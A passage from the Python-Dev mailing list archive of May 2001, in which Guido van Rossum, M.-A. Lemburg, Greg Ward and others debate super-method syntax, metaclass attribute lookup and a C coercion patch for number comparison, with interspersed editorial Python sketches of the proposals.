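    color = "red"   # class variable doubling as an instance default

    def __init__(self):
        # Rebinding through the class updates the shared counter;
        # "self.initcount += 1" would create an instance attribute instead.
        C.initcount += 1

    def __del__(self):
        C.delcount += 1
```

Reading a.color on a fresh instance falls back to C.color; assigning a.color = "blue" creates an instance attribute that shadows the default without changing C.color.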

> Now that we have __future__, would such a change be contemplatable?
> Or is it too radical to even think about?

If we can find a way to spell "super.method", we should be ready for
the future.  I can't think of something right off the bat
unfortunately.

But the issue of backwards compatibility is a big one here: the idioms
for calling base class methods and using class variables as defaults
for instance variables are so common that we will have to support
these for many future versions!  (Two things I am not looking forward
to: fixing all the Zope code that uses this, and telling the author of
Programming Python, 2nd ed.)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From greg@cosc.canterbury.ac.nz  Wed May  2 03:48:20 2001
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Wed, 02 May 2001 14:48:20 +1200 (NZST)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <200105020248.VAA30315@cj20424-a.reston1.va.home.com>
Message-ID: <200105020248.OAA16329@s454.cosc.canterbury.ac.nz>

Guido:

> Except that sometimes you really do want x.__class__.__classdict__ to
> have priority (e.g. for "guarded" attributes).

What's a "guarded" attribute?

> But the issue of backwards compatibility is a big one here

I was thinking that, while this is still in the __future__,
the __dict__ attribute would be a pseudo-dict that, by
default, behaves like the union of the old __dict__ and
the __classdict__.
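The transitional pseudo-dict behaves much like collections.ChainMap (Python 3.3 and later). A minimal sketch, assuming that entries of the new __dict__ take priority over __classdict__ (the proposal does not say which wins); new_dict and classdict are hypothetical contents of one class.

```python
from collections import ChainMap

# Hypothetical contents of one class under the proposal:
new_dict = {"initcount": 0}                     # what __dict__ would hold
classdict = {"foo": lambda self: "foo called"}  # what __classdict__ would hold

# Lookups search new_dict first, then classdict; writes go to new_dict.
compat_dict = ChainMap(new_dict, classdict)
```

Old code that reads or updates compat_dict sees the union of both namespaces, while new stores land only in new_dict.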

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From mal@lemburg.com  Wed May  2 08:59:03 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 09:59:03 +0200
Subject: [Python-Dev] Coercion and comparison of numbers
References: <3AEF2903.79308F55@lemburg.com> <200105020129.UAA24690@cj20424-a.reston1.va.home.com> <20010501174215.A9565@glacier.fnational.com>
Message-ID: <3AEFBE47.A847C5D2@lemburg.com>

Neil Schemenauer wrote:
> 
> [MAL]
> > I just received a bug report for mx.Number which revealed a
> > problem with the comparison code in Python 2.1. Looking at
> > the code it seems that one of my original coercion patches
> > did not make it into the core. I added a new API, PyNumber_Compare(),
> > which knows about the new coercion mechanism and should be called for
> > numbers instead of trying coercion in PyObject_Compare().
> 
> I remember the API.  I don't remember what happened to it.  Guido
> might have dropped it or I might have taken it out thinking the
> comparison issues would be sorted out by Guido.

Good; so there's a chance for getting it back in :-)
 
> Why is a new API needed?  Why can't PyObject_Compare() do the
> right thing (ie. not coerce new style numbers)?

I think the reason for implementing number compares as a separate
API was simply to move code out of PyObject_Compare() into
a new function, not so much any higher-level need
to do number compares.

[Guido]
> > Was this part of the coercion patch left out on purpose or
> > a simple oversight ? I hope the latter... 
> 
> Hard to say.  I don't think I paid very close attention to your patch;
> Neil did, but I changed a lot of the code around coercions and
> comparisons in order to implement rich comparisons.  So, several
> things may have happened: Neil lost it; Neil decided against it; or I
> ripped it out.
> 
> Can you elucidate me regarding the issues?  (If there's code, please
> quote it or link to a specific patch.)  Since the concept of "number"
> is ill-defined at best, when exactly should PyNumber_Compare() be
> called?  What is it supposed to do?  Does it need a rich cousin?

The reasoning is simple: the coercion patches basically pass
control over coercion down to the APIs in question and thus provide
the type with more information to choose from.

This is currently implemented in 2.1 for all number methods,
but not for number comparisons, which do have the same problems
with centralized coercion as, e.g., __add__ or other binary
operators.

Here's part of the original patch:

--- Include/orig/abstract.h	Wed May 13 00:28:58 1998
+++ Include/abstract.h	Thu May 21 12:31:55 1998
@@ -447,11 +447,18 @@ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 
 	 This function always succeeds.
 
        */
 
-     PyObject *PyNumber_Add Py_PROTO((PyObject *o1, PyObject *o2));
+     PyObject *PyNumber_Compare Py_PROTO((PyObject *o1, PyObject *o2));
+
+       /*
+	 Returns the result of comparing o1 and o2, or null on failure.
+	 This is the equivalent of the Python expression: cmp(o1,o2).
+       */
+
+      PyObject *PyNumber_Add Py_PROTO((PyObject *o1, PyObject *o2));
 
        /*
 	 Returns the result of adding o1 and o2, or null on failure.
 	 This is the equivalent of the Python expression: o1+o2.
 
[...]

 }
 
+/* Emulate old method for comparing numeric types using coercion and
+   tp_compare. If coercion doesn't work, we use the type names as
+   comparison basis (like PyObject_Compare() does too). */
+
+static PyObject *
+_PyNumber_OldstyleCompare(PyObject *v, 
+			  PyObject *w)
+{
+    int err;
+
+    DPRINTF("_PyNumber_OldstyleCompare(%s at 0x%lx, %s at 0x%lx);\n",
+	    v->ob_type->tp_name,(long)v,
+	    w->ob_type->tp_name,(long)w);
+    err = PyNumber_CoerceEx(&v, &w);
+    if (err < 0)
+	    return NULL;
+    else if (err == 0 && v->ob_type->tp_compare) {
+	    int cmp;
+	    
+	    cmp = (*v->ob_type->tp_compare)(v, w);
+	    /* XXX Test for errors ? Looks like C types cannot raise
+	       exceptions in the compare slot... */
+	    Py_DECREF(v);
+	    Py_DECREF(w);
+	    DPRINTF(" compare slot returned: %i",cmp);
+	    return PyInt_FromLong(cmp);
+    }
+    DPRINTF(" using type names for comparison\n");
+    return PyInt_FromLong(strcmp(v->ob_type->tp_name, 
+				 w->ob_type->tp_name));
+}
+
+PyObject *
+PyNumber_Compare(v, w)
+	PyObject *v, *w;
+{
+	DPRINTF("PyNumber_Compare(%s at 0x%lx, %s at 0x%lx);\n",
+		v->ob_type->tp_name,(long)v,
+		w->ob_type->tp_name,(long)w);
+	BINOP("__cmp__", "__rcmp__", PyNumber_Compare);
+	return _PyNumber_BinaryOperation(v,w,
+					 NB_SLOT(nb_cmp),
+					 "cmp()");
+}
+

[...]

+static PyObject *
+_PyNumber_BinaryOperation(PyObject *v,
+			  PyObject *w,
+			  const int op_slot,
+			  const char *operation)
+{
+	PyNumberMethods *mv, *mw;
+	register PyObject *x;
+	register binaryfunc *slot;
+	int c;
...
+	/* When using old coercion, make sure that the requested slot
+	   is available on old style numbers or use an emulation. */
+	if (op_slot > NB_SLOT(nb_hex)) {
+
+	    /* Emulation hooks: */
+	    if (op_slot == NB_SLOT(nb_cmp))
+		return _PyNumber_OldstyleCompare(v,w);
+
+	    goto badOperands;
+	}


[...]

 int
 PyObject_Compare(v, w)
 	PyObject *v, *w;
 {
 	PyTypeObject *tp;
@@ -291,27 +294,30 @@ PyObject_Compare(v, w)
 			Py_DECREF(res);
 			PyErr_SetString(PyExc_TypeError,
 					"comparison did not return an int");
 			return -1;
 		}
-		c = PyInt_AsLong(res);
+		c = PyInt_AS_LONG(res);
 		Py_DECREF(res);
 		return (c < 0) ? -1 : (c > 0) ? 1 : 0;	
 	}
 	if ((tp = v->ob_type) != w->ob_type) {
-		if (tp->tp_as_number != NULL &&
-				w->ob_type->tp_as_number != NULL) {
-			int err;
-			err = PyNumber_CoerceEx(&v, &w);
-			if (err < 0)
+		if (tp->tp_as_number != NULL ||
+		    w->ob_type->tp_as_number != NULL) {
+			PyObject *res;
+			int c;
+			res = PyNumber_Compare(v,w);
+			if (res == NULL)
 				return -1;
-			else if (err == 0) {
-				int cmp = (*v->ob_type->tp_compare)(v, w);
-				Py_DECREF(v);
-				Py_DECREF(w);
-				return cmp;
+			if (!PyInt_Check(res)) {
+			    PyErr_SetString(PyExc_TypeError,
+					"comparison did not return an int");
+			    return -1;
 			}
+			c = PyInt_AS_LONG(res);
+			Py_DECREF(res);
+			return (c < 0) ? -1 : (c > 0) ? 1 : 0;	
 		}
 		return strcmp(tp->tp_name, w->ob_type->tp_name);
 	}
 	if (tp->tp_compare == NULL)
 		return (v < w) ? -1 : 1;
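
An editorial Python model of the dispatch order the patch aims for: the operand types get the first say, and only then do the old coercion route and, as a last resort, the type-name comparison apply. The hook names `__cmp__`/`__rcmp__` mirror the BINOP() line. `old_coerce()` is a hypothetical stand-in for PyNumber_CoerceEx() that only knows `int` and `float`, and using `NotImplemented` to mean "try the next step" is an assumption of the sketch, not something the patch specifies.

```python
def old_coerce(v, w):
    """Hypothetical stand-in for PyNumber_CoerceEx(): only knows int and float."""
    nums = (int, float)
    if isinstance(v, nums) and isinstance(w, nums):
        if isinstance(v, float) or isinstance(w, float):
            return float(v), float(w)
        return v, w
    return None  # coercion not possible

def _sign(a, b):
    return (a > b) - (a < b)

def number_compare(v, w):
    """Sketch of the PyNumber_Compare() dispatch order; returns -1, 0 or 1."""
    # 1. The left operand's type gets the first chance.
    hook = getattr(type(v), "__cmp__", None)
    if hook is not None:
        result = hook(v, w)
        if result is not NotImplemented:
            return result
    # 2. Then the right operand's type. By assumption, __rcmp__(self, other)
    #    returns cmp(other, self), which here is cmp(v, w).
    rhook = getattr(type(w), "__rcmp__", None)
    if rhook is not None:
        result = rhook(w, v)
        if result is not NotImplemented:
            return result
    # 3. Old-style fallback: coerce to a common type, then compare.
    coerced = old_coerce(v, w)
    if coerced is not None:
        return _sign(*coerced)
    # 4. Last resort, as in PyObject_Compare(): compare the type names.
    return _sign(type(v).__name__, type(w).__name__)
```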


-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal@lemburg.com  Wed May  2 10:09:17 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 11:09:17 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020052.TAA24315@cj20424-a.reston1.va.home.com>
Message-ID: <3AEFCEBD.2E5979C9@lemburg.com>

Guido van Rossum wrote:
> 
> While implementing more class-like behavior for built-in types in the
> experimental descr-branch in the 2.2 CVS tree, I've noticed problems
> caused by Python's collapsing of class attributes and instance
> attributes.
> 
> For example, suppose d is a dictionary.  My experimental changes make
> d.__class__ return DictType (from the types module).
> (DictType.__class__ is TypeType, by the way.)  I also added special
> methods.  For example, d.__repr__() now returns repr(d).  I am
> preparing for subclassing of built-in types, so I will eventually be
> able to derive a class MyDictType from DictType, as follows:
> 
> class MyDictType(DictType):
>   ...
> 
> Now comes the fun part.  Suppose MyDictType wants to define its own
> repr():
> 
> class MyDictType(DictType):
>   def __repr__(self):
>     return "MyDictType(%s)" % DictType.__repr__(self)
> 
> But, (surprise, surprise!), DictType itself also has a __repr__()
> method: it returns the string "<type 'dictionary'>".
> 
> So the above code would fail: DictType.__repr__() returns
> repr(DictType), and DictType.__repr__(self) raises an argument count
> error.  The correct __repr__ method for dictionary objects can be
> found as DictType.__dict__['__repr__'], but that looks hideous!
> 
> What to do?  Pragmatically, I can make DictType.__repr__ return
> DictType.__dict__['__repr__'], and all will be well in this example.
> But we have to tread carefully here: DictType.__class__ is TypeType,
> but DictType.__dict__['__class__'] is a descriptor for the __class__
> attribute on dictionary objects.
> 
> The best rule I can think of so far is that DictType.__dict__ gives
> the *true* set of attribute descriptors for dictionary objects, and is
> > thus similar to Smalltalk's class.methodDict that Jim describes
> below.  DictType.foo is a shortcut that can resolve to either
> DictType.__dict__['foo'] or to an attribute (maybe a method) of
> DictType described in TypeType.__dict__['foo'], whichever is defined.
> If both are defined, I propose the following, clumsy but backwards
> compatible rule: if DictType.__dict__['foo'] describes a method, it
> wins.  Otherwise, TypeType.__dict__['foo'] wins.

I'm not sure I can follow you here: DictType.__repr__ is the
representation method of the dictionary and not inherited
from TypeType, so there should be no problem.

The problem with the misleading error message would only show
up in case DictType does not define a __repr__ method. Then the
inherited one from TypeType would come into play and cause
the problem you mention above.

Thinking in terms of meta-classes, I believe we should implement
this mechanism in the meta-class (TypeType in this case). Its
__getattr__() will have to decide whether or not to expose its
own methods and attributes.

The only catch here is that currently instances and classes have 
control of whether and how to bind found functions as methods or not. 
We should probably change that to pass complete control over to the
meta-class object and remove the special control flows currently found
in instance_getattr2() and class_lookup().

In general, I think that meta-classes should not expose their
attributes to the class objects they create, since this causes
way too many problems.

Perhaps I'm oversimplifying things here, but I have a feeling that
we can go a long way by actually trying to see meta-classes as 
first class members in the interpreter design and moving all the 
binding and lookup mechanisms over to this object type. The special 
casing should then take place in the meta-class rather than its 
creations.

-- 
Marc-Andre Lemburg


From thomas.heller@ion-tof.com  Wed May  2 11:57:42 2001
From: thomas.heller@ion-tof.com (Thomas Heller)
Date: Wed, 2 May 2001 12:57:42 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz>  <200105020248.VAA30315@cj20424-a.reston1.va.home.com>
Message-ID: <038601c0d2f6$b6159770$e000a8c0@thomasnotebook>

> > The most common use for these seems to be for calling
> > inherited methods, so perhaps something like
> > 
> >    inherited MyBaseClass.foo(arg, ...)
> > 
> > which would be equivalent to
> > 
> >    getmethod(MyBaseClass, 'foo')(self, arg, ...)
> > 
> > where getmethod() is a new builtin like getattr()
> > except that it looks in the __classdict__, and 'self'
> > is really whatever the first argument of the containing
> > method was.
> 
> The second most common use is to reference class variables
> (e.g. imagine a class that keeps counters of how many instances have
> been created and deleted in C.initcount and C.delcount).  But these
> should not have to change, since they really are class attributes.
> 
> > Now that we have __future__, would such a change be contemplatable?
> > Or is it too radical to even think about?
> 
> If we can find a way to spell "super.method", we should be ready for
> the future.  I can't think of something right off the bat
> unfortunately.

Could we make

  super(self, MyBaseClass).foo(arg, ...)

behave similarly to

  MyBaseClass.foo(self, arg, ...)

Wrapping this stuff in a function would probably also
make it possible to use the same pattern in existing Python versions.
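
A rough editorial sketch of such a wrapper, written for modern Python (it relies on `__mro__`, which classic classes lack). The name `BaseProxy` is hypothetical; it avoids clashing with the built-in `super()` that Python later gained, which takes the class first and starts its search after that class rather than at it.

```python
class BaseProxy:
    """Hypothetical helper: BaseProxy(self, Base).foo(arg) ~ Base.foo(self, arg)."""

    def __init__(self, obj, base):
        self._obj = obj
        self._base = base

    def __getattr__(self, name):
        # Search the named base class and its ancestors, not type(obj).
        for klass in self._base.__mro__:
            if name in vars(klass):
                attr = vars(klass)[name]
                # Bind functions (and other descriptors) to the wrapped object.
                if hasattr(attr, "__get__"):
                    return attr.__get__(self._obj, type(self._obj))
                return attr
        raise AttributeError(name)
```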

Thomas


From thomas.heller@ion-tof.com  Wed May  2 12:12:21 2001
From: thomas.heller@ion-tof.com (Thomas Heller)
Date: Wed, 2 May 2001 13:12:21 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020052.TAA24315@cj20424-a.reston1.va.home.com>
Message-ID: <03d301c0d2f8$c29d3960$e000a8c0@thomasnotebook>

> Jim Althoff (a big commercial user of J[P]ython) sent me a summary of
> how metaclasses work in Smalltalk.  He should know, since he invented
> them! :-)  I include it below, with his permission.

I found this very interesting reading.

[From Jim Althoff]
> In the list below, indentation indicates class hierarchy (superclass --
> subclass)
The indentation, unfortunately, seems to be destroyed.

> 
> plain-class
> ----------------
> <none>
> o Class
>    o  Object                                                   isInstanceOf
> o ObjectMetaClass                     isInstanceOf  MetaClass
>         o Class                                                isInstanceOf
> o ClassMetaClass                    isInstanceOf  MetaClass
>             o MetaClass                                  isInstanceOf
> o MetaClassMetaClass      isInstanceOf  MetaClass
>         . . .
>         o Rectangle                                        isInstanceOf
> o RectangleMetaClass          isInstanceOf  MetaClass
>             o SpecializedRectangle            isInstanceOf
> o SpecializedRectangleMetaClass  isInstanceOf  MetaClass

A question for Jim (this is more Smalltalk than Python related):
How does the Behavior class fit into this picture?

Thomas


From guido@digicool.com  Wed May  2 13:15:57 2001
From: guido@digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 07:15:57 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 12:57:42 +0200."
 <038601c0d2f6$b6159770$e000a8c0@thomasnotebook>
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com>
 <038601c0d2f6$b6159770$e000a8c0@thomasnotebook>
Message-ID: <200105021215.HAA31939@cj20424-a.reston1.va.home.com>

> > If we can find a way to spell "super.method", we should be ready for
> > the future.  I can't think of something right off the bat
> > unfortunately.
> 
> Could we make
> 
>   super(self, MyBaseClass).foo(arg, ...)
> 
> behave similar to
> 
>   MyBaseClass.foo(self, arg, ...)
> 
> Wrapping this stuff in a function would probably also
> enable to use the same pattern in existing python versions.

Yes, I can see how to write super() using current tools (or 1.5.2
even).  The problem is that this makes super calls even more wordy
than they already are!  I can't think of anything that wouldn't
require compiler support though.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From gward@python.net  Wed May  2 13:57:41 2001
From: gward@python.net (Greg Ward)
Date: Wed, 2 May 2001 08:57:41 -0400
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <200105021215.HAA31939@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Wed, May 02, 2001 at 07:15:57AM -0500
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com>
Message-ID: <20010502085741.B515@gerg.ca>

On 02 May 2001, Guido van Rossum said:
> Yes, I can see how to write super() using current tools (or 1.5.2
> even).  The problem is that this makes super calls even more wordy
> than they already are!  I can't think of anything that wouldn't
> require compiler support though.

I was just doing some gedanken with various ways to spell "super", and I
think my favourite is the same as Java's (as I remember it):

class MyClass (BaseClass):
    def foo (self, arg1, arg2):
         super.foo(arg1, arg2)


Since I don't know much about Python's guts, I can't say how
implementable this is, but I like the spelling.  The semantics would be
something like this (with adjustments to the reality of Python's guts):

  * 'super' is a magic object that only makes sense inside a 'def'
    inside a 'class' (at least for now; perhaps it could be generalized
    to work at class scope as well as method scope, but let's keep
    it simple)

  * super's notional __getattr__() does something like this:
    - peek at the calling stack frame and fetch the calling function
      (MyClass.foo) and the first argument to that function (self)
    - [is this possible?] ensure that calling_function is a bound
      method, and that it's bound to the self object we just plucked
      from the stack; raise a "misuse of super object" exception if not
    - walk the superclass tree starting at self.__class__.__bases__
      (ie. skip self's class), looking for an object with the name
      passed to this __getattr__() call -- 'foo'
    - when found, return it
    - if not found, raise AttributeError

The ability to peek at the calling stack frame is essential to this
scheme, in order to fetch the "current object" (self) without needing to
have it explicitly passed.  Is this as bothersome from C as it is from
Python?

        Greg
-- 
Greg Ward - nerd                                        gward@python.net
http://starship.python.net/~gward/
In space, no one can hear you fart.


From mal@lemburg.com  Wed May  2 14:07:27 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 15:07:27 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca>
Message-ID: <3AF0068F.32388C87@lemburg.com>

Greg Ward wrote:
> 
> On 02 May 2001, Guido van Rossum said:
> > Yes, I can see how to write super() using current tools (or 1.5.2
> > even).  The problem is that this makes super calls even more wordy
> > than they already are!  I can't think of anything that wouldn't
> > require compiler support though.
> 
> I was just doing some gedanken with various ways to spell "super", and I
> think my favourite is the same as Java's (as I remember it):
> 
> class MyClass (BaseClass):
>     def foo (self, arg1, arg2):
>          super.foo(arg1, arg2)
> 
> Since I don't know much about Python's guts, I can't say how
> implementable this is, but I like the spelling.  The semantics would be
> something like this (with adjustments to the reality of Python's guts):
> ...

This doesn't work in Python since Python has multiple inheritance,
e.g. super in 

class A(B,C):
	def foo(self):
		super.foo()

is ambiguous.

I'd rather suggest adding a function for finding the basemethod
of a method. This is probably the most common task in this context.

-- 
Marc-Andre Lemburg


From thomas.heller@ion-tof.com  Wed May  2 14:12:40 2001
From: thomas.heller@ion-tof.com (Thomas Heller)
Date: Wed, 2 May 2001 15:12:40 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca>
Message-ID: <049901c0d309$92c515d0$e000a8c0@thomasnotebook>

[Greg Ward]

> On 02 May 2001, Guido van Rossum said:
> > Yes, I can see how to write super() using current tools (or 1.5.2
> > even).  The problem is that this makes super calls even more wordy
> > than they already are!  I can't think of anything that wouldn't
> > require compiler support though.
> 
> I was just doing some gedanken with various ways to spell "super", and I
> think my favourite is the same as Java's (as I remember it):
> 
> class MyClass (BaseClass):
>     def foo (self, arg1, arg2):
>          super.foo(arg1, arg2)
> 
> 
> Since I don't know much about Python's guts, I can't say how
> implementable this is, but I like the spelling.  The semantics would be
> something like this (with adjustments to the reality of Python's guts):
> 
>   * 'super' is a magic object that only makes sense inside a 'def'
>     inside a 'class' (at least for now; perhaps it could be generalized
>     to work at class scope as well as method scope, but let's keep
>     it simple)
> 
>   * super's notional __getattr__() does something like this:
>     - peek at the calling stack frame and fetch the calling function
>       (MyClass.foo) and the first argument to that function (self)
>     - [is this possible?] ensure that calling_function is a bound
>       method, and that it's bound to the self object we just plucked
>       from the stack; raise a "misuse of super object" exception if not
>     - walk the superclass tree starting at self.__class__.__bases__
Careful!
The search in the above context must start at MyClass.__bases__,
which may not be the same as self.__class__.__bases__.

Thomas


From guido@digicool.com  Wed May  2 15:29:03 2001
From: guido@digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 09:29:03 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 08:57:41 -0400."
 <20010502085741.B515@gerg.ca>
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com>
 <20010502085741.B515@gerg.ca>
Message-ID: <200105021429.JAA32055@cj20424-a.reston1.va.home.com>

[Greg Ward, welcome back!]
> I was just doing some gedanken with various ways to spell "super", and I
> think my favourite is the same as Java's (as I remember it):
> 
> class MyClass (BaseClass):
>     def foo (self, arg1, arg2):
>          super.foo(arg1, arg2)

I'm sure that's everybody's favorite way to spell it!  It's mine too. :-)

> Since I don't know much about Python's guts, I can't say how
> implementable this is, but I like the spelling.  The semantics would be
> something like this (with adjustments to the reality of Python's guts):
> 
>   * 'super' is a magic object that only makes sense inside a 'def'
>     inside a 'class' (at least for now; perhaps it could be generalized
>     to work at class scope as well as method scope, but let's keep
>     it simple)

Yes, that's about the only way it can be made to work.  The compiler
will have to (1) detect that 'super' is a free variable, and (2) make
it a local and initialize it with the proper magic.  Or, to relieve
the burden from the symbol table, we could make super a keyword, at
the cost of breaking existing code.

I don't think super is needed outside methods.

>   * super's notional __getattr__() does something like this:
>     - peek at the calling stack frame and fetch the calling function
>       (MyClass.foo) and the first argument to that function (self)
>     - [is this possible?] ensure that calling_function is a bound
>       method, and that it's bound to the self object we just plucked
>       from the stack; raise a "misuse of super object" exception if not

I don't think you can make that test, but making it a 'magic local'
as I suggested above would avoid the problem.

>     - walk the superclass tree starting at self.__class__.__bases__
>       (ie. skip self's class), looking for an object with the name
>       passed to this __getattr__() call -- 'foo'
>     - when found, return it
>     - if not found, raise AttributeError

Yup, that's the easy part. :-)

> The ability to peek at the calling stack frame is essential to this
> scheme, in order to fetch the "current object" (self) without needing to
> have it explicitly passed.  Is this as bothersome from C as it is from
> Python?

No, in C it's easy.  The problem is that there is no information in
the frame that tells you where the currently executing function was
defined -- all you have is the code object, which is
context-independent.
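
An editorial sketch of Greg's frame-peeking object in modern CPython, using `sys._getframe()` (a CPython-specific function). It works around the gap described above by scanning `type(self).__mro__` for the class whose dictionary holds a function with the running frame's code object, then starts the search after that class, as Thomas pointed out it must. Starting after `type(self)` instead would make `B.foo` call itself forever when invoked on a `C` instance. `magic_super` is a hypothetical name, and the scan does not handle decorated or renamed methods.

```python
import sys

class _MagicSuper:
    """Hypothetical 'super' object that finds self and the caller via the stack."""

    def __getattr__(self, name):
        frame = sys._getframe(1)                    # method that evaluated magic_super.<name>
        code = frame.f_code
        obj = frame.f_locals[code.co_varnames[0]]   # first argument, i.e. "self"
        mro = type(obj).__mro__
        # The frame does not record where its code object was defined, so
        # look for the class whose dict holds a function with this code.
        for i, klass in enumerate(mro):
            func = vars(klass).get(code.co_name)
            if getattr(func, "__code__", None) is code:
                break
        else:
            raise RuntimeError("misuse of super object")
        # Search strictly after the defining class, not after type(obj).
        for klass in mro[i + 1:]:
            if name in vars(klass):
                attr = vars(klass)[name]
                if hasattr(attr, "__get__"):
                    return attr.__get__(obj, type(obj))
                return attr
        raise AttributeError(name)

magic_super = _MagicSuper()
```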

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@digicool.com  Wed May  2 15:30:20 2001
From: guido@digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 09:30:20 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 15:07:27 +0200."
 <3AF0068F.32388C87@lemburg.com>
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca>
 <3AF0068F.32388C87@lemburg.com>
Message-ID: <200105021430.JAA32075@cj20424-a.reston1.va.home.com>

> This doesn't work in Python since Python has multiple inheritance,
> e.g. super in 
> 
> class A(B,C):
> 	def foo(self):
> 		super.foo()
> 
> is ambiguous.

I'm not sure what you mean.  The search is totally well-defined: first
search B for a foo method, then search C.
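
A small editorial model of that rule: the depth-first, left-to-right search used by classic classes, started at the bases of the class that contains the calling method. The helper names are hypothetical. Because every modern class inherits from `object`, this depth-first walk can reach `object` before a later base for names that `object` defines (such as `__repr__`), a diamond problem that new-style classes later addressed with a different method resolution order.

```python
def classic_lookup(cls, name):
    """Depth-first, left-to-right search, as for classic classes."""
    if name in vars(cls):
        return vars(cls)[name]
    for base in cls.__bases__:
        try:
            return classic_lookup(base, name)
        except AttributeError:
            continue
    raise AttributeError(name)

def super_lookup(cls, name):
    """Find `name` for a super call made from a method defined in `cls`."""
    for base in cls.__bases__:   # skip cls itself: search B first, then C
        try:
            return classic_lookup(base, name)
        except AttributeError:
            continue
    raise AttributeError(name)
```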

> I'd rather suggest adding a function for finding the basemethod
> of a method. This is probably the most common task in this context.

I've never heard of the concept of basemethod, but if I may venture a
guess, it would be the same definition as I give above.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From jeremy@digicool.com  Wed May  2 14:38:42 2001
From: jeremy@digicool.com (Jeremy Hylton)
Date: Wed, 2 May 2001 09:38:42 -0400 (EDT)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <200105021429.JAA32055@cj20424-a.reston1.va.home.com>
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz>
 <200105020248.VAA30315@cj20424-a.reston1.va.home.com>
 <038601c0d2f6$b6159770$e000a8c0@thomasnotebook>
 <200105021215.HAA31939@cj20424-a.reston1.va.home.com>
 <20010502085741.B515@gerg.ca>
 <200105021429.JAA32055@cj20424-a.reston1.va.home.com>
Message-ID: <15088.3554.953359.757584@slothrop.digicool.com>

>>>>> "GvR" == Guido van Rossum <guido@digicool.com> writes:

  >> Since I don't know much about Python's guts, I can't say how
  >> implementable this is, but I like the spelling.  The semantics
  >> would be something like this (with adjustments to the reality of
  >> Python's guts):
  >>
  >> * 'super' is a magic object that only makes sense inside a 'def'
  >> inside a 'class' (at least for now; perhaps it could be
  >> generalized to work at class scope as well as method scope, but
  >> let's keep it simple)

  GvR> Yes, that's about the only way it can be made to work.  The
  GvR> compiler will have to (1) detect that 'super' is a free
  GvR> variable, and (2) make it a local and initialize it with the
  GvR> proper magic.  Or, to relieve the burden from the symbol table,
  GvR> we could make super a keyword, at the cost of breaking existing
  GvR> code.

  GvR> I don't think super is needed outside methods.

It seems helpful to clarify here, since this came up in conversation
at PythonLabs just the other day with the yield statement.

If we try to avoid keywords, we have to take the "well, I don't see
anyone assigning to this name" route.  If the compiler does not detect
any assignment to a nearly reserved word, like super, it would give
the use of that word special meaning.

There are a bunch of little problems.  A module could (not necessarily
should) be designed to have a global name poked into its namespace;
this would break, because the name would already have transmogrified
from a regular variable into a special one.  The use of exec or import
star would make it impossible for the word to take on its special
meaning.

So keywords really are a lot clearer, but they have the potential to
be incompatible.
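
An editorial sketch of the "nobody assigns to it" test using the standard `symtable` module: it reports whether `super` is referenced in a given function without being bound there or at module level. The function names are hypothetical. The third test case shows the blind spot described above: a module-level `from m import *` could bind `super` at run time, yet the symbol table cannot know that.

```python
import symtable

def _find_function(table, name):
    """Depth-first search of the symbol-table tree for a function block."""
    for child in table.get_children():
        if isinstance(child, symtable.Function) and child.get_name() == name:
            return child
        found = _find_function(child, name)
        if found is not None:
            return found
    return None

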